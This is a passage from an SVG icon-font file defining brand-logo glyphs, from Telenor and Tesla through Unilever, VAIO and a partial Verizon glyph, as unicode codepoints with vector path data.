<glyph glyph-name="brand-telenor" horiz-adv-x="1000" unicode="&#xe946;" d="M516 423c0 12 0 23 0 34 0 6-2 8-7 11-14 7-29 8-45 3-10-3-19-7-28-13-34-21-62-48-89-77-42-45-80-95-119-143-16-19-33-38-54-53-30-21-64-30-100-23-40 7-64 32-71 72-8 38 1 72 24 103 26 35 58 63 94 87 66 45 138 78 217 96 29 7 59 11 89 13 23 2 47 0 71-2 11-2 25 9 27 20 5 25 11 49 21 71 21 49 51 92 95 121 50 33 104 56 163 65 19 2 39 4 58 3 28-1 56-4 83-14 12-5 23-11 33-19 30-26 29-54 0-79-15-13-34-22-52-30-44-19-91-31-137-43-49-13-98-22-146-37-21-6-42-13-62-21-6-3-10-7-12-13-4-11-8-22-11-33-1-5-1-7 4-9 40-16 73-42 106-69 25-21 49-42 71-67 59-66 109-138 141-222 18-45 27-93 25-142-1-30-7-59-24-85-16-26-40-38-70-39-33 0-62 12-89 29-36 22-65 53-90 87-31 42-52 89-70 138-18 47-29 95-36 145-4 30-7 59-9 89-1 16-1 31-1 46z" />
<glyph glyph-name="brand-teliasonera" horiz-adv-x="1000" unicode="&#xe947;" d="M812 410c-13 8-21 7-32-3-102-85-213-155-337-205-105-42-212-72-329-47 14-23 27-44 43-62 66-74 152-101 247-105 56-1 112 9 166 24 64 19 124 45 180 81 24 15 47 33 69 51 36 29 66 62 84 105 14 34 7 65-13 95-20 29-49 47-78 66z m-581-171c93 13 181 45 266 83 56 25 111 53 163 86 21 13 44 24 65 40-4 2-6 4-8 4-94 33-191 55-289 73l-4 1-20 4-219 41c-18 4-37 8-55 12-9 1-17 3-25 5-9 3-14 1-20-6-62-84-85-173-48-274 11-28 28-47 55-58 46-21 93-17 139-11z m337-263c-76-22-153-31-233-19-29 5-57 13-89 26 37-38 73-68 114-91 36-22 74-36 116-41 65-7 121 18 173 50 76 47 132 113 181 187 11 18 24 35 33 58-3-2-5-2-6-3-81-83-180-134-289-167z m243 696c-33-20-66-40-102-55-89-36-183-47-281-49 46-8 90-16 135-24 67-12 134-28 200-46 15-8 27-5 39 7 22 22 47 41 69 64 25 26 48 54 67 84 25 41 19 77-9 113-7 9-9 11-17 1-30-36-63-68-101-95z m163-43c-31-63-78-113-127-163 43-21 80-46 110-87 19 85 30 166 17 250z m-831 8l51-14s280-63 485 14l5 2c44 16 86 34 123 63 35 22 63 51 91 80 7 8 5 11-2 17-22 16-46 26-71 33-71 22-144 21-217 12-147-19-283-68-405-152-23-15-44-32-65-54l5-1z" />
<glyph glyph-name="brand-tesla" horiz-adv-x="1000" unicode="&#xe948;" d="M501 650c16 20 32 39 48 58 3 3 8 6 13 6 102 2 204-3 304-24 27-5 53-14 80-22-32-41-75-63-123-79-7 43-41 53-75 60-28 5-57 5-85 8-7 1-10-1-11-9-23-115-46-231-70-347-25-130-51-260-77-389-1-6-2-12-5-17-7 36-14 71-22 107-28 140-56 280-83 420-16 75-31 151-46 227-1 5-2 8-8 8-37-1-73-2-108-14-14-5-29-13-40-23-8-7-11-19-17-31-45 16-88 38-124 79 24 7 45 13 67 18 62 15 126 23 190 26 43 2 86 1 129 2 7 1 12-2 16-7 15-19 30-37 47-57z m499 92c-9-12-18-24-27-36-1-2-6-2-9-1-43 10-85 23-128 30-56 10-112 18-168 21-70 5-141 6-211 6-106-1-212-9-316-31-34-7-68-17-103-26-6-2-9-2-13 4-7 11-16 22-25 35 21 6 40 11 60 16 94 24 189 35 285 40 97 6 195 6 292 2 112-5 224-18 332-49 10-3 19-6 29-9 1 0 1-1 2-2z" />
<glyph glyph-name="brand-the-verge" horiz-adv-x="1000" unicode="&#xe949;" d="M892 335v35l-36 0-37 1v-38l14 0 14 0 1-7c1-8-1-9-12-9-11 0-21 5-28 15-4 6-5 9-5 18 0 14 5 24 16 31 8 5 9 5 21 4 9 0 15-2 22-5l9-4v58l-26-1c-31-1-42-3-57-13-17-11-30-29-35-50-3-14-1-38 5-52 11-27 35-46 64-51 17-3 43 1 60 10 14 8 15 10 13 17-1 4-3 20-3 41z m-891 98l0-23-1-23 16 0 15 1 0-56c0-31-1-59-2-61-2-3 0-5 25-5h25v168l-39-1-39 0z m169-3v-64h-30v22l9-1 9-1v44h-70v-164h31c26 0 28 2 27 5-1 2-2 15-2 30l-1 26h27v-22c0-14 1-30 0-32l-1-7h53v164h-52z m60 0l2-5c4-10 3-151 0-155-3-3 1-4 47-4h49v53l-3-2c-2 0-13-1-23-2l-20-1 1 10 1 9 6 1c4 0 9-1 13-2l7-1v40l-14-1-14 0 1 10 1 10 13 0c8 1 18 0 23-2l8-2v44h-98z m252 0l-17-44c-9-25-17-44-18-43-1 1-17 45-17 47 0 0 6 1 13 1l13 1 8 20c4 10 7 18 7 19 0 0-26-1-58-1h-58l4-3c4-4 45-97 68-154l3-7h35l26 64c15 34 27 63 28 63 2 0 0-121-2-123-1-2 8-4 49-4h47v28c0 14 1 24 1 24s-3-2-7-3c-5-2-13-4-22-4h-16l1 11 0 10 7 1c3 1 8 0 12-1l6-1v40l-14-1-14 0v18l21-1c12-1 21-1 23-2 3-1 2 0 2 24v21h-131z m255-92l-7 6 4 6c14 19 12 51-5 67-13 14-28 17-75 17l-31 0 1-4c2-5 2-153 0-157-2-3 0-3 28-3 29 0 29 0 28 4-1 1-2 12-2 24 0 21 0 21 4 20 7-3 17-10 21-17 5-8 7-23 4-29l-2-6h30c17 0 29 3 28 4 0 1-2 11-4 21-4 23-11 39-22 47z m-43 25c-4-3-7-6-11-6h-10v18c0 12 3 16 6 16 2 0 6-2 9-3 10-5 14-17 6-25z m301-45c-5-2-38-4-41-3-1 1-1 4-1 10l1 9 12-1c6 0 11-1 12-2 3-1 2 1 2 20v20l-16-1-15 0v21h16c12 0 21-1 30-4l5-2 0 24-1 24-49 0-50 1 1-4c2-5 2-155 0-159-1-3 2-5 49-5h48v53l-3-1z" />
<glyph glyph-name="brand-thenextweb" horiz-adv-x="1000" unicode="&#xe94a;" d="M439 445c-17 17-40 26-64 26h-133v-242h91v151h29c8 0 16-3 22-9l31-31c6-6 9-13 9-21v-90h91v102c0 24-10 47-27 65l-49 49z m470 26v-90c0-8-3-15-9-21l-31-31c-6-6-14-9-22-9h-43c9 14 14 31 14 49v102h-91v-90c0-8-3-15-8-21l-32-31c-6-6-13-9-21-9h-29v151h-91v-242h132c24 0 48 9 65 26l30 31v-57h87c24 0 47 9 64 26l50 50c17 17 26 40 26 64v102h-91z m-909-91h61v-151h91v151h60v91h-212z" />
<glyph glyph-name="brand-toshiba" horiz-adv-x="1000" unicode="&#xe94b;" d="M422 361c-8 4-21 6-41 6-15 1-26 1-26 14 0 13 12 13 13 13 4 1 16 1 19 0 3 0 12-3 12-12l0-5h40v10c0 26-14 39-50 40-23 0-32 1-48-4-16-4-28-17-28-39 0-20 4-38 24-45 10-3 31-4 37-5 9 0 26 1 26-14 0-14-10-14-22-14-8 0-25-1-25 14l0 5h-40v-8c0-9-1-39 36-43 34-3 58 0 70 4 17 6 24 22 24 42 0 26-7 34-21 41z m-204 66h0c-30-1-67 0-70-51-1-6-1-16-1-26s0-20 1-26c3-50 38-51 70-51h0c32 0 66 2 69 51 1 6 1 16 1 26s-1 20-1 26c-3 50-36 50-69 51z m27-92c0-16-3-29-27-28h0c-24-1-28 12-28 28 0 6-1 11-1 15s1 8 1 14c0 17 5 29 28 28h0c24 1 27-11 27-28 0-6 1-10 1-14s-1-9-1-15z m-245 52h46v-112h44v112h44v37h-134v-37z m635 37h42v-149h-42v149z m318 0h-60l-46-149h44l8 28h49l8-29h44l-47 150z m-45-88l15 51 14-51h-29z m-95 17s0 0 1 0c4 1 22 7 23 28 1 21-5 44-45 43h-81v-149h77c40 0 51 14 52 40 0 21-11 34-27 38z m-60 37h26c12 0 15-4 15-12 0-9-5-13-13-13h-28v25z m28-81h-28v27h31c8 0 12-3 12-12 0-12-6-15-15-15z m-221 60h-48v55h-43v-149h43v57h48v-57h42v149h-42v-55z" />
<glyph glyph-name="brand-toyota" horiz-adv-x="1000" unicode="&#xe94c;" d="M511 671c82-1 173-16 259-51 55-23 106-53 149-95 34-34 60-72 73-117 17-61 7-119-26-173-27-45-64-79-108-108-59-38-123-63-192-79-67-15-136-21-204-17-94 5-184 25-269 67-46 23-88 52-123 90-31 33-55 71-65 116-13 59-1 113 30 164 29 46 68 81 113 109 59 37 122 61 190 76 53 12 107 18 173 18z m-367-151c-2-1-2-1-3-1-27-22-51-46-69-76-28-47-36-96-18-148 14-42 41-74 74-102 41-35 88-59 139-77 46-17 94-28 143-34 5-1 11-1 17-1-2 3-3 6-5 8-1 3-2 5-3 8-29 59-41 123-46 188-2 28-1 57-2 86 0 3-1 5-4 5-23 5-46 10-68 16-38 10-74 24-107 47-27 20-49 43-48 81z m429-440c3 1 6 1 8 1 26 4 52 8 77 13 61 13 119 35 172 68 38 24 73 54 97 94 26 42 36 88 23 137-10 38-31 69-58 96-11 11-23 21-35 32 1-33-15-55-38-73-13-10-28-20-42-27-45-24-94-36-144-45-3 0-4-1-4-5 1-33 0-67-4-101-3-38-10-76-21-113-7-26-17-52-31-77z m-161 289c-1-1-1-2-1-3-1-59 3-118 17-176 6-28 15-56 30-82 5-10 12-19 22-26 10-8 29-8 40 0 10 7 18 17 24 28 12 21 19 43 25 66 9 32 14 65 16 98 2 31 3 61 4 91 0 2-1 3-1 4-29-1-59-4-88-4-29 1-59 3-88 4z m159 250c35-62 48-129 55-197 2 0 3-1 3 0 13 2 25 4 37 6 34 8 67 17 98 33 14 8 28 17 38 30 13 17 13 35 0 52-11 15-26 25-43 32-45 19-91 32-139 39-16 2-32 4-49 5z m-142 0c-7 0-13-1-18-2l-18-2c-52-6-103-19-151-40-17-7-32-17-43-31-7-8-11-17-11-29 1-13 7-23 16-31 12-12 25-20 40-27 32-15 66-24 101-31 9-2 19-3 29-5 3 35 8 68 17 102 9 33 20 65 38 96z m156-203c1 1 1 1 1 2-3 30-7 60-14 90-6 27-14 54-28 79-7 10-14 20-24 28-12 9-26 10-39 1-5-5-11-10-15-15-11-15-19-31-25-48-13-36-20-73-24-111-1-9-2-17-3-26 58-5 115-6 171 0z" />
<glyph glyph-name="brand-tribenet" horiz-adv-x="1000" unicode="&#xe94d;" d="M906 357c-9 0-18-1-27-4l-51 96c10 12 16 28 16 45 0 38-31 70-70 70-23 0-43-11-56-28l-249 78c0 3 0 7 0 11 0 38-31 70-69 70s-70-32-70-70c0-6 1-11 2-16l-158-67c-16 27-46 45-80 45-52 0-94-42-94-93s42-94 94-94c16 0 32 4 45 12l155-191c-10-19-15-41-15-64 0-84 68-151 151-151 73 0 135 53 148 123h0l246 90c16-30 47-50 82-50 52 0 94 42 94 94s-42 94-94 94z m-720 121c0 4 1 8 1 13l161 87c13-14 31-23 52-23 18 0 35 7 48 19l41-14c-96-6-173-86-173-185 0-17 3-34 7-50l-137 153z m156-199v2l1-1-1-1z m208-31c-28 36-71 60-120 60-15 0-29-2-43-6-13 21-21 46-21 73 0 75 61 137 136 137 75 0 136-62 136-137 0-58-37-108-88-127z m268 46l-226-81c57 32 95 93 95 162 0 57-25 107-65 141l82-27c3-36 33-65 70-65 5 0 11 0 16 2l54-93c-12-11-21-24-26-39z" />
<glyph glyph-name="brand-ubuntu" horiz-adv-x="1000" unicode="&#xe94e;" d="M831 343c-1-9-2-16-3-23-5-32-15-61-31-89-25-42-59-75-102-97-47-26-97-34-151-28-26 3-52 10-76 22-7 3-9 1-12-4-17-30-35-60-52-89-9-15-17-30-27-47 19-8 37-16 56-23 46-18 94-26 143-24 28 1 56 6 84 9 5 0 6 3 7 8 0 7 1 14 2 21 11 46 39 79 83 97 20 9 41 12 63 11 21-2 41-8 60-18 89 89 120 213 118 274-54 0-108 0-162 0z m-412-188c-16 17-34 31-48 49-29 37-46 80-51 127-3 36-1 72 10 106 14 43 37 81 70 111 7 6 13 11 19 17-4 7-8 14-13 21-23 37-47 75-71 113-2 3-4 6-8 3-14-11-27-22-40-33-30-27-54-59-75-93-18-31-33-63-42-99 3-2 6-3 8-5 13-11 27-22 38-35 22-26 29-57 28-91-2-48-24-85-64-112-4-3-5-5-4-10 6-13 11-27 17-39 16-37 38-70 65-101 24-28 52-51 83-72 1 1 1 1 1 1 27 45 53 90 80 135 1 1-1 6-3 7z m279 431c79-43 122-112 133-202h162c-5 99-43 183-107 257-49-33-100-39-152-12-57 30-78 80-73 143-104 22-201 6-295-45 31-48 60-94 88-139 83 39 164 40 244-2z m-592-135c-56 0-100-45-99-99 0-56 45-98 98-98 54-1 99 45 99 98 1 54-44 99-98 99z m695 202c54 0 96 45 98 97 1 54-46 101-98 100-56 1-101-45-100-98 0-57 44-100 100-99z m4-607c-53 0-99-45-99-98 0-52 46-98 99-98 49-1 97 41 98 98 1 52-45 98-98 98z" />
<glyph glyph-name="brand-unilever" horiz-adv-x="1000" unicode="&#xe94f;" d="M585 738c45-9 8-30 10-46 14-4 32 42 42-3 0-1 4-2 5-1 15 20 27 1 41-3 34-10 66-6 91 20 27 29 28 63 15 98-12 33-38 44-71 46-24 1-70-10-88-21-6-3-10 1-14 2-9 3-16 13-28 9 5-19 39-39-3-58 39-14 21-28 0-43z m94 91c13 7 26 9 41 6 37-8 55-41 48-86-5-33-33-54-67-51-12 1-27 3-31 15-6 18 7 11 15 8 5-2 9-3 17-6-15 47 22 14 33 26-3 14-47 32 8 41-14 13-46-3-38 29 1 3-13 0-19-1-6-2-12-2-15 5-2 7 3 11 8 14z m-28-28c14 2 28-19 36-41 0 0-35-30-39-27-8 7-21 16-22 25-1 18 8 42 25 43z m26-684c23-2 34 11 34 32 1 32-19 50-49 64 5-23-8-40-10-59-2-19 2-35 25-37z m71 327c-10 0-17-7-16-18 1-9 8-14 17-13 9 1 13 8 15 16-3 8-7 16-16 15z m-163 337z m-129-723c1-13-4-16-16-10-14 6-27 0-32-13-12-31-31-48-72-38 22-37 50-34 77-29 24 4 44 18 49 46 1 7-5 23 9 19 35-11 19 15 18 25 0 15-18 15-27 18-10 3-7-11-6-18z m217-58c-1-23 20-18 37-21 14 5 39-1 38 25-1 22-23 20-37 19-16 0-38 1-38-23z m259 582c-36-15-38-22-11-52 10-11 22-21 33-30 10-8 18-3 20 8 4 33 10 66 3 99-12 1-16-8-22-12-8-4-15-10-23-13z m-81 35c-4 15-8 38-24 37-33-2-67 13-101-2-14-6-12-12-9-22 10-29 43-50 81-50 11-1 24 2 37 8 12 5 19 15 16 29z m-100 14c26-5 48-9 71-14-25-23-54-17-71 14z m49 63c44-6 87-11 128 7 38 16 53 43 47 83-3 18-14 35-6 55 4 9-5 8-11 9-28 6-34-2-34-40-1-12 0-23-11-30-4-3-10-2-14 1-10 9-7 20-3 31 5 15 6 31-14 35-25 6-49 5-79-5 16-6 25-10 34-14 10-6 26-10 24-23-2-11-17-6-26-9-5-2-12-1-15-9 7-3 14-4 20-7 15-7 34-10 37-31 1-7-1-14-9-17-18-9-32 3-49 15 4-22-1-38-19-51z m136 81c1 5 5 8 9 7 3-1 6-5 8-8 6-17 2-32-13-42-15-11-33-14-53-12 22 14 46 26 49 55z m-153-437c-19-2-42 2-51-23 17-14 45-20 41-49-5-31-37-28-56-37 8-18 21-31 41-37 0 4 1 8 1 12 0 20 5 46 26 42 21-3 12-29 8-46-2-8-10-21 10-17 5 1 12-8 27-18-14 22-9 32 15 34-18 11-29 18-37 29-5 9-13 19-3 27 9 8 19 0 27-7 8-7 14-16 21-24 14 14 18 29 11 48-20-3-46-18-53 1-9 25 24 21 38 29-8 21-23 29-44 31 0-13 6-25 1-37-3-7-4-17-14-16-11 1-13 12-13 20 0 13 8 25 4 38z m-528-84c5-9 11-17 13-27 4-16 0-26-20-20-4 1-7 9-12 2-4-5-2-11 1-17 7-14 19-17 33-14 18 5 25 19 22 37-2 22-18 37-30 54-27 40-55 79-42 137-38-33-57-67-55-112 1-22 2-48-36-40 4-16 13-21 25-18 15 2 21 13 22 28 3 25-6 53 10 77 2-30 18-54 19-83 0-10 4-23-12-26-5-1-10 0-9-7 1-5 4-10 9-11 21-5 29 7 28 25 0 17-6 33-12 49-9 23-14 47-5 73 10-40 30-74 51-107z m491-140c14 0 26 5 26 22 0 20-13 34-31 34-18 0-4-23-14-30-4-18 5-25 19-26z m217 515c8 13 12 26-5 42-8-37-34-48-64-54-8-2-19-1-16-13 1-9 12-11 19-10 26 3 51 10 66 35z m-30 37c-4 9-11 6-18 4-9-3-19-6-28-8-7-2-19 2-15-12 2-9 7-16 24-15 8 1 19 7 30 14 5 4 11 10 7 17z m-265-59c7-3 11 7 14 13 4 11 12 27 2 33-15 9-32 20-52 14-16-4-27-13-27-34 11 4 19 9 29 10 6 0 21 2 17-13-5-16 9-19 17-23z m-7-119c-11 0-19-6-20-18 0-13 7-20 20-22 12 2 20 9 19 22 0 11-8 18-19 18z m43 40c-14 1-23-8-23-22 0-13 7-21 21-21 14-1 22 7 22 21 0 14-8 22-20 22z m-2-156c13 0 22 8 23 22 0 16-9 24-23 27-14-3-25-9-25-25 0-15 10-24 25-24z m-105 228c-8-1-10-16-9-26 2-13 3-37 15-33 17 6 31 1 46 2 33 3 51 24 47 62-5-7-9-16-15-19-14-6-31-35-44 4-2 7-26 11-40 10z m25-489c9-1 15 4 16 13-1 12-8 21-20 22-13 1-7-12-9-18-3-10 2-17 13-17z m27 125c7-5 16-8 23-3 11 8 0 16-3 23-3 9-8 19 6 22 8 2 21 2 21-10 0-14 6-14 16-13 13 3 28 2 33 15 4 8-8 16-15 20-9 4-16 25-28 8-7-9-11-12-22-10-7 2-11 7-12 15 0 10 4 17 13 22 12 6 27 6 36 19-39 18-39 18-53-16-1-3-5-7-8-7-8-1-11 6-10 12 10 41-22 50-48 65-14-42-12-48 21-68 4-3 9-5 13-8 8-7 16-15 9-26-9-14-16-2-24 4-5 4-10 10-18 6-8-4-6-12-6-19 0-13 2-27-7-43 23 2 33 13 43 24 5 6 10 16 19 10 8-6 0-13-3-19-4-9-5-16 4-23z m-56 211c-1-13 7-21 19-22 11 0 18 8 21 19-2 11-7 19-19 20s-19-5-21-17z m-456 106c-2 18-13 35-37 34-40 0-73-32-71-71 2-26 29-16 43-18 27-4 68 31 65 55z m-62-40c-13 5-21 15-21 29-1 6 0 13 7 15 8 2 8-6 10-11 6-9 12-18 19-26-3-9-9-9-15-7z m36 24c-15 3-18 16-22 27 0 8 3 14 10 12 15-3 19-18 24-30 2-5-5-11-12-9z m-33-398c-16 18-20 38-6 59 12-1 16-20 32-12-11 23-6 44 5 65 18 36 37 71 49 109 4 13 12 26 2 42-20-22-20-56-48-73-5 34 24 60 16 97-24-25-21-59-44-86-6 28 7 50 0 75-17-15-13-34-18-50-3-8-2-21-13-21-12 0-7 14-8 22-2 7 3 15-7 25-16-41-18-80-10-121 2-11 0-30 19-26 16 4 23 20 21 36 0 6-5 11-6 17-2 9-1 19 9 23 10 4 13-6 18-12 14-13 15-27 4-43-10-15-20-29-29-45-29-51-23-99 18-136 7-7 16-24 27-12 9 10 6 27-5 38-8 10-18 19-26 29z m214-150c11 35-7 84-38 102-21 13-43 18-64 3-16-11-20-28-17-45 5-26 21-43 47-50 16-4 33-1 40 16 9 19 2 36-15 47-7 6-18 10-24 1-6-11 4-15 12-20 7-3 17 2 20-10-10-17-24-14-39-7-15 8-21 21-18 37 1 14 11 21 24 23 28 3 58-27 59-60 1-28-16-44-48-44-38 0-62 18-75 54-5 15-1 31-6 48-23-16-28-37-23-61 12-49 65-82 118-75 24 4 40 18 47 41z m-234 763c1 6-8 6-12 5-15-4-27-10-22-32 16 6 30 11 34 27z m4-151c-20 7-24 25-30 42-14-12-18-24-8-37 9-12 21-18 38-5z m13-164c-22-5-40-3-57 12 8-37 19-40 57-12z m624-340c-40-13-79-19-112 6-23 16-26-4-32-13-8-13 5-19 16-23 15-7 32-5 46 2 21 11 21-6 26-17 9-17-6-18-15-20-19-5-38-4-56 4-24 11-40 29-42 57-1 28 18 38 40 46 6 3 18 4 15 11-10 37 17 21 31 24 7 1 25 4 12 13-31 20 8 18 7 27-36 17-77 7-108-28-31-35-36-87-11-128 24-40 70-59 117-47 37 9 63 43 66 86z m-79-127c-6 6 0 20-21 16-26-6-57-9-82 11-11 10-19 11-26-5-8-18-24-30-42-37-16-7-31-12-43-28-16-19-45-11-55 11-7 14-13 27-30 35-3-39-30-49-65-50 11-16 24-23 38-24 28-2 51-15 74-28 46-25 94-28 142-7 11 5 18 4 28-3 22-15 46-12 71 6-60 7-73 10-87 32-12 20-21 20-38 6-37-28-78-31-109-7 43-1 82 5 112 36 19 20 33 19 44-7 3-5 6-10 10-15 27-29 52-24 66 12 3 9 1 21 13 26 14 6 7 14 0 20z m-51-39c-11-1-16 7-16 17 1 9 7 14 16 14 10 0 13-7 15-16-2-8-6-15-15-15z m187 46c-24-15-49-21-77-16-23 4-41-15-44-46-2-24 11-37 39-37 32 3 65 12 92 38 12 12 21 26 19 45-2 19-9 28-29 16z m-25-62c-11-7-23-14-36-9-7 2-3 8-3 13 1 15 40 39 53 32 2-1 4-5 4-7 1-14-8-23-18-29z m244 416c-9 4-15-1-21-7-8-7-13-18-28-21 3 25 16 40 29 55 39 50 32 90-21 122-7 4-15 7-19 15-25 52-68 68-124 58-6-1-12 0-18 2-20 6-19-6-17-19 12-70 73-104 142-77 23 9 41 8 57-10 16-18 19-40 7-61-4-9-9-24-23-19-12 5-12 18-10 29 1 14 10 28 1 42-42-27-42-51-3-77 8-5 13-9 7-18-9-13-12-29-27-38-5-4-6-10-10-1-20 50-81 69-95 124 0 3-5 4-10 7-1-6-1-10-2-14-10-45-8-48 38-61 24-6 41-22 52-42 10-17 18-36 27-54 29 34 33 35 55 4 12 11 17 25 19 40 1 7 3 16-6 21z m-117 135c-14 10 5 15 2 23-10 5-17-4-25-5-5 0-24-24-17 9 3 15-22-2-36 13 21 2 19 16 18 29 15-1 16-17 28-19 9 3 1 15 10 19 15 4 13-52 41-11 7-15 13-28 28-41-22 0-37-5-49-17z m-32-38c28-36 55-63 77-93-17 34-16 82-77 93z m37-287c-27 10-52 7-70-17-15-19-33-33-56-38-12-3-22-8-15-23 7-14 18-8 28-3 18 11 32 28 46 43 5 4 10 12 17 5 6-7 3-14-3-19-13-12-26-24-40-36-15-13-12-23 3-33 17-12 33-13 48 3 9 11 17 22 27 33 5 6 8 20 19 12 8-6 1-17-3-24-11-20-28-34-48-44-5-3-15-6-9-15 5-7 9-13 20-9 30 11 74 73 75 107-2 27-13 48-39 58z m2-46c-14 0-25 7-27 23-1 9 6 14 15 15 13-3 27-8 30-24 2-12-10-15-18-14z m61 153c-15-1-20-11-19-25 0-9 0-15-13-13-15 3-26-5-29-19-4-16 7-25 19-30 19-8 35-19 44-43 27 35 43 68 30 108-5 15-15 24-32 22z m-830 210c5-12 15-14 29-7-10 10-9 24-12 38-18-6-22-17-17-31z m328-271c8-6 17-12 14-24-4-12-15-15-26-17-34-5-63 4-87 28-6-5-7-11-7-17-1-58 67-97 122-70 25 13 39 34 41 62 1 27-13 43-37 52-14 5-19 19-29 29-14-19-8-32 9-43z m29-39c8 3 9-6 9-13-3-16-15-28-30-33-11-3-9 7-10 14 0 21 17 26 31 32z m-259 266c20 19 41 33 71 27-2-6-4-11-5-15-15-51-7-99 25-142 5-6 10-15 19-9 12 8 3 16-2 23-22 30-25 65-28 101-1 14 6 30 19 33 11 3 18-13 22-24 3-10 3-21 5-33 16 8 28 18 30 34 4 26-24 27-37 41 38 10 47 9 78-8 7 44-16 51-88 23 2 18 43 40 3 51-30 8-11-29-26-45-3 4-5 8-8 12-11 13-20 28-39 30-13 1-22-3-24-17-2-16 11-10 19-11 17-2 31-9 40-26-68-2-77-7-74-45z m54-291c35-6 55-25 58-61 0-7 4-14 7-19 12-19 31-25 52-22 9 1 16 7 14 16-4 21-18 38-39 40-24 1-30 13-35 32-7 24-20 44-51 44-9-1-23 1-26-12-3-14 11-16 20-18z m-136 507c-1 24-14 44-30 43-15-1-23-10-24-26 0-18 21-37 40-37 16 0 12 12 14 20z m77-439c-8-1-13-1-18 5-11 12-31 14-33 3-4-25-40-33-29-62 3-8 10-12 19-13 6 0 13 1 17-2 16-11 37-17 42 2 5 19 25 26 25 48-3 9-8 21-23 19z m-13-35c-1-9-7-15-16-14-9 0-14 7-14 16 1 9 7 14 16 14 9-2 15-7 14-16z m14 324c-1 19-23 47-36 43-16-6-18-22-18-37-1-20 8-35 28-36 18-1 26 13 26 30z m-33 288c13 0 20 20 34 12 12-6 9-20 13-33 11 12 4 32 22 33 16 0 17-20 32-25-13 47-13 47 31 44-8 16-47 17-18 50-16-2-27 2-35-5-17-16-31-19-49 0-8 8-22 6-33 2 21-31-17-27-25-41 47 1 47 1 28-37z m223-364c1-20-9-32-24-42-45-30-45-40 1-70 3-2 5-4 8-5 6-5 15-9 10-19-5-7-14-5-19-1-24 18-28-2-32-17-11-42 23-78 77-80-27 24-25 48-5 74 11 15 19 33 1 48-22 18-18 33-2 53 19 24 14 41-15 59z m22 388c2 1 4 10 2 13-9 15-21 7-38 4 12-15 21-22 36-17z m-381-14c17-1 31-2 44-3 8-1 18 2 22-7 5-9-3-16-9-23-14-17-29-33-43-50-4-4-9-9-3-15 4-4 9-2 14 1 15 8 31 17 47 25 8 3 16 11 25 5 10-5 5-16 5-24 0-5-2-10-3-15 0-6 0-12 5-16 7-5 12 0 16 3 31 18 31 19 36-18l1-15c1-6 1-15 11-15 8 0 9 9 11 16 3 12 5 25 8 38 4 13 11 23 24 7 13-15 18-6 20 7 5 25 17 20 31 8 10-8 20-16 30-24 6-4 11-12 18-7 6 5 3 14 1 20-4 13-10 24-14 37-2 9-13 19-6 27 8 10 20 0 31-2 18-4 44-21 54-3 9 15-17 30-30 43-36 38-36 39 10 59 4 2 11 2 11 11-13 0-25 1-37-1-17-2-39-1-45-18-6-15 15-24 23-36 5-9 20-17 13-27-9-14-21 0-32 3-2 0-4 1-6 2-7 0-14 10-21 1-6-6-2-15-1-23 2-15 19-26 14-44-20 5-28 27-49 29-8-9 3-28-11-31-12-4-11 17-24 19-13-10-3-31-19-42-12 14-2 34-13 47-13-4-16-16-24-24-3-2-6-5-10-2-2 1-3 5-3 7 0 13 12 29-1 36-11 6-24-10-37-14-3 0-6 1-12 1 7 18 21 25 31 37 9 11 10 19-8 21-7 1-14 0-21 2-17 4-19 12-6 24 4 4 10 7 15 10 4 4 11 7 10 13-2 7-9 8-15 9-24 3-48 5-74 1 7-12 16-10 23-13 7-4 18-2 20-11 2-9-9-12-15-17-10-7-24-12-32-29z m374-99c-16 14-31 28-56 39 9-27 23-44 37-60 5-7 10-22 22-12 11 10 9 23-3 33z m-4-67c-28 23-46-7-69-17-1 8-2 13-3 19-4 18-12 32-31 36-19 4-36-1-50-15-3-3-12-9-4-13 31-16 18-38 3-51-21-18-20 14-33 22-2-23-7-45 16-55 36-17 65 1 93 27 11-18 10-38 26-50 13-9 28-11 42-2 15 10 5 17-2 27-8 12-6 30 6 38 14 8 5-16 18-17 4 19 5 38-12 51z m-132-59c-1 30 3 58 26 80 1-30-3-58-26-80z m36 12c-9-2-11 7-9 14 3 11 3 26 17 28 11 2 7-11 9-15 0-15-5-24-17-27z m68-23c-2-5-5-12-13-9-5 2-5 8-4 12 3 18 4 37 22 55 7-23 2-41-5-58z" />
<glyph glyph-name="brand-vaio" horiz-adv-x="1000" unicode="&#xe950;" d="M593 279c-6 0-11 2-16 5-16 10-27 24-37 39-15 23-28 48-43 72-12 19-25 37-43 51-34 27-74 27-108 2-14-10-25-23-35-37-17-25-30-51-46-77-10-16-21-32-36-45-19-14-39-15-58 0-10 8-18 17-25 27-15 21-26 43-39 65-14 22-28 44-47 62-16 14-34 22-55 23-4 1-5 0-5-4 0-11 0-23 0-34 0-3 1-5 4-5 11-1 21-7 29-14 7-6 13-14 18-21 17-23 29-48 44-72 13-22 27-42 47-59 33-28 77-29 112-2 15 11 27 26 38 42 14 21 26 43 38 64 11 17 21 34 35 47 21 20 45 21 66 1 12-10 20-22 28-35 16-24 29-50 44-73 12-18 24-34 41-47 14-11 30-17 48-19 6-1 6 0 6 6v16c0 5 0 11 0 16 1 4-1 5-5 6z m292 187c-65 0-116-52-116-117 0-63 52-115 116-115 63 0 115 52 115 116 0 64-51 116-115 116z m-1-189c-40 0-73 33-73 74 0 39 34 72 74 72 39 0 72-33 72-73 0-40-32-73-73-73z m-194 185c-3 4-4 4-8 1-15-13-22-30-23-50 0-29 0-57 0-86h0v-48c0-14 0-27 0-41 0-3 1-4 4-4 12 0 23 0 35 0 3 0 5 1 5 4 0 5 0 10 0 15l-1 153c0 9 1 17 7 23 2 2 0 4-1 5-6 9-12 19-18 28z m-291-120c-18 0-32-14-32-32 0-18 14-32 32-32 17 0 32 14 32 32 0 17-14 32-32 32z" />
<glyph glyph-name="brand-verizon" horiz-adv-x="1000" unicode="&#xe951;" d="M348 377c-4-4-6-9-10-13 0 8 0 16 0 24h-42v-144h45v69c-1 12 4 24 14 31 9 7 21 7 32 6v38c-14 4-29-1-39-11z m-52 11h0v0z m-10-84c0 21-4 43-16 61-21 29-65 35-95 18v0c-20-10-33-31-35-53-3-20 0-42 12-59 10-16 28-27 47-30 18-3 37-1 54 8 15 8 26 21 31 38-14 0-29 0-43 0-7-17-29-19-43-11-10 6-15 17-16 28 34 0 69 0 104 0z m-104 28c2 11 7 21 17 26 10 4 24 4 32-4 6-6 9-14 10-22h-59z m-182 56z m103 0c-10-31-18-62-29-93-9 31-19 62-28 93h-46c18-48 33-96 51-144 15 0 31 0 46 0 17 48 33 96 50 144-15 0-29 1-44 0z m467-40c2 2 4 4 5 7l1 33h-121v0c0-12 0-23 0-35 23 1 45 0 67 1 1-2-1-3-2-4-22-24-43-49-65-73v-33c41 